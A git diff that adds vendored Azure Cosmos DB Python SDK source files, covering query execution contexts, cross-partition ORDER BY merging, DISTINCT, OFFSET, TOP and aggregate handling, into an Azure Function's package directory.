+ """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctUnorderedEndpointComponent, self).__init__(execution_context) + self.last_result = set() + + def make_hash(self, value): + if isinstance(value, (set, tuple, list)): + return tuple([self.make_hash(v) for v in value]) + if not isinstance(value, dict): + if isinstance(value, numbers.Number): + return float(value) + return value + new_value = copy.deepcopy(value) + for k, v in new_value.items(): + new_value[k] = self.make_hash(v) + + return tuple(frozenset(sorted(new_value.items()))) + + async def __anext__(self): + res = await self._execution_context.__anext__() + + json_repr = json.dumps(self.make_hash(res)).encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + + while hashed_result in self.last_result: + res = await self._execution_context.__anext__() + json_repr = json.dumps(self.make_hash(res)).encode("utf-8") + + hash_object = hashlib.sha1(json_repr) # nosec + hashed_result = hash_object.hexdigest() + self.last_result.add(hashed_result) + return res + + +class _QueryExecutionOffsetEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling offset query. + + It returns results offset by as many results as offset arg specified. + """ + def __init__(self, execution_context, offset_count): + super(_QueryExecutionOffsetEndpointComponent, self).__init__(execution_context) + self._offset_count = offset_count + + async def __anext__(self): + while self._offset_count > 0: + res = await self._execution_context.__anext__() + if res is not None: + self._offset_count -= 1 + else: + raise StopAsyncIteration + return await self._execution_context.__anext__() + + +class _QueryExecutionAggregateEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling aggregate query. + + It returns only aggreated values. 
+ """ + + def __init__(self, execution_context, aggregate_operators): + super(_QueryExecutionAggregateEndpointComponent, self).__init__(execution_context) + self._local_aggregators = [] + self._results = None + self._result_index = 0 + for operator in aggregate_operators: + if operator == "Average": + self._local_aggregators.append(_AverageAggregator()) + elif operator == "Count": + self._local_aggregators.append(_CountAggregator()) + elif operator == "Max": + self._local_aggregators.append(_MaxAggregator()) + elif operator == "Min": + self._local_aggregators.append(_MinAggregator()) + elif operator == "Sum": + self._local_aggregators.append(_SumAggregator()) + + async def __anext__(self): + async for res in self._execution_context: + for item in res: #TODO check on this being an async loop + for operator in self._local_aggregators: + if isinstance(item, dict) and item: + operator.aggregate(item["item"]) + elif isinstance(item, numbers.Number): + operator.aggregate(item) + if self._results is None: + self._results = [] + for operator in self._local_aggregators: + self._results.append(operator.get_result()) + if self._result_index < len(self._results): + res = self._results[self._result_index] + self._result_index += 1 + return res + raise StopAsyncIteration diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py new file mode 100644 index 0000000..ef8e6fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/execution_dispatcher.py @@ -0,0 +1,192 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for proxy query execution context implementation in the Azure +Cosmos database service. 
+""" + +from azure.cosmos._execution_context.aio import endpoint_component +from azure.cosmos._execution_context.aio import multi_execution_aggregator +from azure.cosmos._execution_context.aio.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.aio.base_execution_context import _DefaultQueryExecutionContext +from azure.cosmos._execution_context.execution_dispatcher import _is_partitioned_execution_info +from azure.cosmos._execution_context.query_execution_info import _PartitionedQueryExecutionInfo +from azure.cosmos.documents import _DistinctType +from azure.cosmos.exceptions import CosmosHttpResponseError +from azure.cosmos.http_constants import StatusCodes + +# pylint: disable=protected-access + +class _ProxyQueryExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + """Represents a proxy execution context wrapper. + + By default, uses _DefaultQueryExecutionContext. + + If backend responds a 400 error code with a Query Execution Info, switches + to _MultiExecutionContextAggregator + """ + + def __init__(self, client, resource_link, query, options, fetch_function): + """ + Constructor + """ + super(_ProxyQueryExecutionContext, self).__init__(client, options) + + self._execution_context = _DefaultQueryExecutionContext(client, options, fetch_function) + self._resource_link = resource_link + self._query = query + self._fetch_function = fetch_function + + async def __anext__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + + """ + try: + return await self._execution_context.__anext__() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(await self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = await self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return await self._execution_context.__anext__() + + async def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + try: + return await self._execution_context.fetch_next_block() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): #cross partition query not servable + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(await self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = await self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return await self._execution_context.fetch_next_block() + + async def _create_pipelined_execution_context(self, query_execution_info): + + assert self._resource_link, "code bug, resource_link is required." 
+ if query_execution_info.has_aggregates() and not query_execution_info.has_select_value(): + if self._options and ("enableCrossPartitionQuery" in self._options + and self._options["enableCrossPartitionQuery"]): + raise CosmosHttpResponseError(StatusCodes.BAD_REQUEST, + "Cross partition query only supports 'VALUE ' for aggregates") + + execution_context_aggregator = multi_execution_aggregator._MultiExecutionContextAggregator(self._client, + self._resource_link, + self._query, + self._options, + query_execution_info) + await execution_context_aggregator._configure_partition_ranges() + return _PipelineExecutionContext(self._client, self._options, execution_context_aggregator, + query_execution_info) + + +class _PipelineExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + + DEFAULT_PAGE_SIZE = 1000 + + def __init__(self, client, options, execution_context, query_execution_info): + super(_PipelineExecutionContext, self).__init__(client, options) + + if options.get("maxItemCount"): + self._page_size = options["maxItemCount"] + else: + self._page_size = _PipelineExecutionContext.DEFAULT_PAGE_SIZE + + self._execution_context = execution_context + + self._endpoint = endpoint_component._QueryExecutionEndpointComponent(execution_context) + + order_by = query_execution_info.get_order_by() + if order_by: + self._endpoint = endpoint_component._QueryExecutionOrderByEndpointComponent(self._endpoint) + + aggregates = query_execution_info.get_aggregates() + if aggregates: + self._endpoint = endpoint_component._QueryExecutionAggregateEndpointComponent(self._endpoint, aggregates) + + offset = query_execution_info.get_offset() + if offset is not None: + self._endpoint = endpoint_component._QueryExecutionOffsetEndpointComponent(self._endpoint, offset) + + top = query_execution_info.get_top() + if top is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, top) + + limit = query_execution_info.get_limit() + if limit is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, limit) + + distinct_type = query_execution_info.get_distinct_type() + if distinct_type != _DistinctType.NoneType: + if distinct_type == _DistinctType.Ordered: + self._endpoint = endpoint_component._QueryExecutionDistinctOrderedEndpointComponent(self._endpoint) + else: + self._endpoint = endpoint_component._QueryExecutionDistinctUnorderedEndpointComponent(self._endpoint) + + async def __anext__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + return await self._endpoint.__anext__() + + async def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + This method internally invokes next() as many times required to collect + the requested fetch size. + + :return: List of results. 
+ :rtype: list + """ + + results = [] + for _ in range(self._page_size): + try: + results.append(await self.__anext__()) + except StopAsyncIteration: + # no more results + break + return results diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py new file mode 100644 index 0000000..8284079 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/multi_execution_aggregator.py @@ -0,0 +1,193 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for multi execution context aggregator implementation in the Azure Cosmos database service. +""" + +from azure.cosmos._execution_context.aio.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.aio import document_producer, _queue_async_helper +from azure.cosmos._routing import routing_range +from azure.cosmos import exceptions + +# pylint: disable=protected-access + + +class _MultiExecutionContextAggregator(_QueryExecutionContextBase): + """This class handles queries that require rewriting based on + the backend's returned query execution info. + + This class maintains the execution context for each partition key range + and aggregates the corresponding results from each execution context. + + When handling an orderby query, _MultiExecutionContextAggregator + instantiates one instance of DocumentProducer per target partition key range + and aggregates the result of each.
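What the aggregator below performs is essentially an n-way merge across per-partition result streams, ordered by the comparator; the synchronous standard-library analogue is heapq.merge:

import heapq

# Illustrative sorted per-partition streams; each partition's ORDER BY
# results arrive already sorted, so only the merge step is needed.
partition_streams = [[1, 4, 7], [2, 5, 8], [3, 6, 9]]
print(list(heapq.merge(*partition_streams)))  # [1, 2, 3, ..., 9]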
+ """ + + # TODO improvement: this class needs to be parallelized + + class PriorityQueue: + """Provides a Priority Queue abstraction data structure""" + + def __init__(self): + self._heap = [] + + async def pop_async(self, document_producer_comparator): + return await _queue_async_helper.heap_pop(self._heap, document_producer_comparator) + + async def push_async(self, item, document_producer_comparator): + await _queue_async_helper.heap_push(self._heap, item, document_producer_comparator) + + def peek(self): + return self._heap[0] + + def size(self): + return len(self._heap) + + def __init__(self, client, resource_link, query, options, partitioned_query_ex_info): + super(_MultiExecutionContextAggregator, self).__init__(client, options) + + # use the routing provider in the client + self._routing_provider = client._routing_map_provider + self._client = client + self._resource_link = resource_link + self._query = query + self._partitioned_query_ex_info = partitioned_query_ex_info + self._sort_orders = partitioned_query_ex_info.get_order_by() + + if self._sort_orders: + self._document_producer_comparator = document_producer._OrderByDocumentProducerComparator(self._sort_orders) + else: + self._document_producer_comparator = document_producer._PartitionKeyRangeDocumentProducerComparator() + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + async def __anext__(self): + """Returns the next result + + :return: The next result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._orderByPQ.size() > 0: + + targetRangeExContext = await self._orderByPQ.pop_async(self._document_producer_comparator) + res = await targetRangeExContext.__anext__() + + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetRangeExContext.peek() + await self._orderByPQ.push_async(targetRangeExContext, self._document_producer_comparator) + + except StopAsyncIteration: + pass + + return res + raise StopAsyncIteration + + async def fetch_next_block(self): + + raise NotImplementedError("You should use pipeline's fetch_next_block.") + + async def _repair_document_producer(self): + """Repairs the document producer context by using the re-initialized routing map provider in the client, + which loads in a refreshed partition key range cache to re-create the partition key ranges. + After loading this new cache, the document producers get re-created with the new valid ranges. 
+ """ + # refresh the routing provider to get the newly initialized one post-refresh + self._routing_provider = self._client._routing_map_provider + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = await self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + await self._orderByPQ.push_async(targetQueryExContext, self._document_producer_comparator) + + except StopAsyncIteration: + continue + + def _createTargetPartitionQueryExecutionContext(self, partition_key_target_range): + + rewritten_query = self._partitioned_query_ex_info.get_rewritten_query() + if rewritten_query: + if isinstance(self._query, dict): + # this is a parameterized query, collect all the parameters + query = dict(self._query) + query["query"] = rewritten_query + else: + query = rewritten_query + else: + query = self._query + + return document_producer._DocumentProducer( + partition_key_target_range, + self._client, + self._resource_link, + query, + self._document_producer_comparator, + self._options, + ) + + async def _get_target_partition_key_range(self): + + query_ranges = self._partitioned_query_ex_info.get_query_ranges() + return await self._routing_provider.get_overlapping_ranges( + self._resource_link, [routing_range.Range.ParseFromDict(range_as_dict) for range_as_dict in query_ranges] + ) + + async def _configure_partition_ranges(self): + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = await self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + await targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + await self._orderByPQ.push_async(targetQueryExContext, self._document_producer_comparator) + + except exceptions.CosmosHttpResponseError as e: + if exceptions._partition_range_is_gone(e): + # repairing document producer context on partition split + await self._repair_document_producer() + else: + raise + + except StopAsyncIteration: + continue diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py new file mode 100644 index 0000000..af38ce8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/base_execution_context.py @@ -0,0 +1,170 @@ +# The MIT License (MIT) +# Copyright (c) 
2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution context implementation in the Azure Cosmos +database service. +""" + +from collections import deque +import copy +from .. import _retry_utility, http_constants + +# pylint: disable=protected-access + + +class _QueryExecutionContextBase(object): + """ + This is the abstract base execution context class. + """ + + def __init__(self, client, options): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + """ + self._client = client + self._options = options + self._is_change_feed = "changeFeed" in options and options["changeFeed"] is True + self._continuation = self._get_initial_continuation() + self._has_started = False + self._has_finished = False + self._buffer = deque() + + def _get_initial_continuation(self): + if "continuation" in self._options: + if "enableCrossPartitionQuery" in self._options: + raise ValueError("continuation tokens are not supported for cross-partition queries.") + return self._options["continuation"] + return None + + def _has_more_pages(self): + return not self._has_started or self._continuation + + def fetch_next_block(self): + """Returns a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + if not self._has_more_pages(): + return [] + + if self._buffer: + # if there is anything in the buffer returns that + res = list(self._buffer) + self._buffer.clear() + return res + + # fetches the next block + return self._fetch_next_block() + + def _fetch_next_block(self): + raise NotImplementedError + + def __iter__(self): + """Returns itself as an iterator""" + return self + + def __next__(self): + """Return the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._has_finished: + raise StopIteration + + if not self._buffer: + + results = self.fetch_next_block() + self._buffer.extend(results) + + if not self._buffer: + raise StopIteration + + return self._buffer.popleft() + + def _fetch_items_helper_no_retries(self, fetch_function): + """Fetches more items and doesn't retry on failure + + :return: List of fetched items. 
+ :rtype: list + """ + fetched_items = [] + # Continues pages till finds a non empty page or all results are exhausted + while self._continuation or not self._has_started: + if not self._has_started: + self._has_started = True + new_options = copy.deepcopy(self._options) + new_options["continuation"] = self._continuation + + (fetched_items, response_headers) = fetch_function(new_options) + continuation_key = http_constants.HttpHeaders.Continuation + # Use Etag as continuation token for change feed queries. + if self._is_change_feed: + continuation_key = http_constants.HttpHeaders.ETag + # In change feed queries, the continuation token is always populated. The hasNext() test is whether + # there is any items in the response or not. + if not self._is_change_feed or fetched_items: + self._continuation = response_headers.get(continuation_key) + else: + self._continuation = None + if fetched_items: + break + return fetched_items + + def _fetch_items_helper_with_retries(self, fetch_function): + def callback(): + return self._fetch_items_helper_no_retries(fetch_function) + + return _retry_utility.Execute(self._client, self._client._global_endpoint_manager, callback) + + next = __next__ # Python 2 compatibility. + + +class _DefaultQueryExecutionContext(_QueryExecutionContextBase): + """ + This is the default execution context. + """ + + def __init__(self, client, options, fetch_function): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + :param method fetch_function: + Will be invoked for retrieving each page + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + super(_DefaultQueryExecutionContext, self).__init__(client, options) + self._fetch_function = fetch_function + + def _fetch_next_block(self): + while super(_DefaultQueryExecutionContext, self)._has_more_pages() and not self._buffer: + return self._fetch_items_helper_with_retries(self._fetch_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py new file mode 100644 index 0000000..a1e676c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/document_producer.py @@ -0,0 +1,279 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for document producer implementation in the Azure Cosmos +database service. +""" + +import numbers +from collections import deque + +from azure.cosmos import _base +from azure.cosmos._execution_context.base_execution_context import _DefaultQueryExecutionContext + + +class _DocumentProducer(object): + """This class takes care of handling of the results for one single partition + key range. + + When handling an orderby query, MultiExecutionContextAggregator instantiates + one instance of this class per target partition key range and aggregates the + result of each. + """ + + def __init__(self, partition_key_target_range, client, collection_link, query, document_producer_comp, options): + """ + Constructor + """ + self._options = options + self._partition_key_target_range = partition_key_target_range + self._doc_producer_comp = document_producer_comp + self._client = client + self._buffer = deque() + + self._is_finished = False + self._has_started = False + self._cur_item = None + # initiate execution context + + path = _base.GetPathFromLink(collection_link, "docs") + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return self._client.QueryFeed(path, collection_id, query, options, partition_key_target_range["id"]) + + self._ex_context = _DefaultQueryExecutionContext(client, self._options, fetch_fn) + + def __lt__(self, other): + return self._doc_producer_comp.compare(self, other) < 0 + + def __iter__(self): + return self + + def __next__(self): + """ + :return: The next result item. + :rtype: dict + :raises StopIteration: If there is no more result. + + """ + if self._cur_item is not None: + res = self._cur_item + self._cur_item = None + return res + + return next(self._ex_context) + + def get_target_range(self): + """Returns the target partition key range. + :return: + Target partition key range. + :rtype: dict + """ + return self._partition_key_target_range + + def peek(self): + """ + TODO: use more_itertools.peekable instead + :return: The current result item. + :rtype: dict. + :raises StopIteration: If there is no current item. + + """ + if self._cur_item is None: + self._cur_item = next(self._ex_context) + + return self._cur_item + + next = __next__ # Python 2 compatibility. + + +def _compare_helper(a, b): + if a is None and b is None: + return 0 + return (a > b) - (a < b) + + +class _PartitionKeyRangeDocumentProduerComparator(object): + """ + Provides a Comparator for document producers using the min value of the + corresponding target partition. + """ + + def __init__(self): + pass + + def compare(self, doc_producer1, doc_producer2): # pylint: disable=no-self-use + return _compare_helper( + doc_producer1.get_target_range()["minInclusive"], doc_producer2.get_target_range()["minInclusive"] + ) + + +class _OrderByHelper(object): + + @staticmethod + def getTypeOrd(orderby_item): + """Returns the ordinal of the value of the item pair in the dictionary. 
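+        These ordinals encode the cross-type sort order used by ORDER BY:
+        undefined < null < booleans < numbers < strings.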
+ + :param dict orderby_item: + + :return: + 0 if the item_pair doesn't have any 'item' key + 1 if the value is undefined + 2 if the value is a boolean + 4 if the value is a number + 5 if the value is a str or a unicode + :rtype: int + """ + if "item" not in orderby_item: + return 0 + val = orderby_item["item"] + if val is None: + return 1 + if isinstance(val, bool): + return 2 + if isinstance(val, numbers.Number): + return 4 + if isinstance(val, str): + return 5 + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def getTypeStr(orderby_item): + """Returns the string representation of the type + + :param dict orderby_item: + :return: String representation of the type + :rtype: str + """ + if "item" not in orderby_item: + return "NoValue" + val = orderby_item["item"] + if val is None: + return "Null" + if isinstance(val, bool): + return "Boolean" + if isinstance(val, numbers.Number): + return "Number" + if isinstance(val, str): + return "String" + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def compare(orderby_item1, orderby_item2): + """Compare two orderby item pairs. + + :param dict orderby_item1: + :param dict orderby_item2: + :return: + Integer comparison result. + The comparator acts such that + - if the types are different we get: + Undefined value < Null < booleans < Numbers < Strings + - if both arguments are of the same type: + it simply compares the values. + :rtype: int + """ + + type1_ord = _OrderByHelper.getTypeOrd(orderby_item1) + type2_ord = _OrderByHelper.getTypeOrd(orderby_item2) + + type_ord_diff = type1_ord - type2_ord + + if type_ord_diff: + return type_ord_diff + + # the same type, + if type1_ord == 0: + return 0 + + return _compare_helper(orderby_item1["item"], orderby_item2["item"]) + + +def _peek_order_by_items(peek_result): + return peek_result["orderByItems"] + + +class _OrderByDocumentProducerComparator(_PartitionKeyRangeDocumentProduerComparator): + """Provide a Comparator for document producers which respects orderby sort order. + """ + + def __init__(self, sort_order): # pylint: disable=super-init-not-called + """Instantiates this class + + :param list sort_order: + List of sort orders (i.e., Ascending, Descending) + + :ivar list sort_order: + List of sort orders (i.e., Ascending, Descending) + + """ + self._sort_order = sort_order + + def compare(self, doc_producer1, doc_producer2): + """Compares the given two instances of DocumentProducers. + + Based on the orderby query items and whether the sort order is Ascending + or Descending compares the peek result of the two DocumentProducers. + + If the peek results are equal based on the sort order, this comparator + compares the target partition key range of the two DocumentProducers. + + :param _DocumentProducer doc_producers1: first instance + :param _DocumentProducer doc_producers2: first instance + :return: + Integer value of compare result. 
+ positive integer if doc_producers1 > doc_producers2 + negative integer if doc_producers1 < doc_producers2 + :rtype: int + """ + + res1 = _peek_order_by_items(doc_producer1.peek()) + res2 = _peek_order_by_items(doc_producer2.peek()) + + self._validate_orderby_items(res1, res2) + + for i, (elt1, elt2) in enumerate(zip(res1, res2)): + res = _OrderByHelper.compare(elt1, elt2) + if res != 0: + if self._sort_order[i] == "Ascending": + return res + if self._sort_order[i] == "Descending": + return -res + + return _PartitionKeyRangeDocumentProduerComparator.compare(self, doc_producer1, doc_producer2) + + def _validate_orderby_items(self, res1, res2): + if len(res1) != len(res2): + # error + raise ValueError("orderByItems cannot have different size") + + if len(res1) != len(self._sort_order): + # error + raise ValueError("orderByItems cannot have a different size than sort orders.") + + for elt1, elt2 in zip(res1, res2): + type1 = _OrderByHelper.getTypeStr(elt1) + type2 = _OrderByHelper.getTypeStr(elt2) + if type1 != type2: + raise ValueError("Expected {}, but got {}.".format(type1, type2)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py new file mode 100644 index 0000000..720c68c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/endpoint_component.py @@ -0,0 +1,209 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution endpoint component implementation in the +Azure Cosmos database service. +""" +import numbers +import copy +import hashlib +import json + +from azure.cosmos._execution_context.aggregators import ( + _AverageAggregator, + _CountAggregator, + _MaxAggregator, + _MinAggregator, + _SumAggregator, +) + + +class _QueryExecutionEndpointComponent(object): + def __init__(self, execution_context): + self._execution_context = execution_context + + def __iter__(self): + return self + + def __next__(self): + # supports python 3 iterator + return next(self._execution_context) + + next = __next__ # Python 2 compatibility. + + +class _QueryExecutionOrderByEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling an order by query. 
+
+    For each processed orderby result it returns the 'payload' item of the result.
+    """
+    def __next__(self):
+        return next(self._execution_context)["payload"]
+
+    next = __next__  # Python 2 compatibility.
+
+
+class _QueryExecutionTopEndpointComponent(_QueryExecutionEndpointComponent):
+    """Represents an endpoint in handling a top query.
+
+    It returns at most as many results as the top arg specifies.
+    """
+
+    def __init__(self, execution_context, top_count):
+        super(_QueryExecutionTopEndpointComponent, self).__init__(execution_context)
+        self._top_count = top_count
+
+    def __next__(self):
+        if self._top_count > 0:
+            res = next(self._execution_context)
+            self._top_count -= 1
+            return res
+        raise StopIteration
+
+    next = __next__  # Python 2 compatibility.
+
+
+class _QueryExecutionDistinctOrderedEndpointComponent(_QueryExecutionEndpointComponent):
+    """Represents an endpoint in handling a distinct query.
+
+    It returns only those values not already returned.
+    """
+    def __init__(self, execution_context):
+        super(_QueryExecutionDistinctOrderedEndpointComponent, self).__init__(execution_context)
+        self.last_result = None
+
+    def __next__(self):
+        res = next(self._execution_context)
+        while self.last_result == res:
+            res = next(self._execution_context)
+        self.last_result = res
+        return res
+
+    next = __next__  # Python 2 compatibility.
+
+
+class _QueryExecutionDistinctUnorderedEndpointComponent(_QueryExecutionEndpointComponent):
